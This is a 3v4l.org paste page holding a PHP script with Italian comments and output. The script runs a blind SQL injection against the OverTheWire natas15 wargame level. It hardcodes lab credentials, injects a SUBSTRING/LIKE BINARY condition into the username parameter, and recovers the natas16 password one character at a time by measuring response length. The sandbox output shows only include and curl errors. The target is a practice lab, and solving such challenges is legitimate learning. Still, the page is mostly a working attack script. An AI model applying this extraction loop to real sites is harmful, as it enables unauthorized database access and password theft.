3v4l.org

run code in 300+ PHP versions simultaneously
<?php #initialization include("LIB_http.php"); include("LIB_parse.php"); $chars=("1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"); $credentials="natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV"; $ch=curl_init(); $pass=""; $target=("natas15.natas.labs.overthewire.org/index.php"); $needle="r e"; for($xx=1;$xx<33;$xx++) for($yy=0;$yy<62;$yy++) { $char=substr($chars,$yy,1); $target2=$target."?username=natas16\" and SUBSTRING(password,$xx,1) LIKE BINARY \"".$char; echo "\n".$target2."\n"; curl_setopt($ch, CURLOPT_URL, $target2); curl_setopt($ch, CURLOPT_USERPWD, $credentials); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $page=curl_exec($ch); echo "\n".strlen($page); if(strlen($page)<288) { $pass=$pass.$char; echo "\n\n\n\n\n\n\n\n\n\n\n\n\nLa pass per ora e': ".$pass."\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; $yy=62; } } echo "\nLa password e': ".$pass; ?>
Output for git.master, git.master_jit, rfc.property-hooks
Warning: include(): open_basedir restriction in effect. File(LIB_http.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 4 Warning: include(LIB_http.php): Failed to open stream: Operation not permitted in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(): open_basedir restriction in effect. File(LIB_parse.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 6 Warning: include(LIB_parse.php): Failed to open stream: Operation not permitted in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
31.89 ms | 402 KiB | 8 Q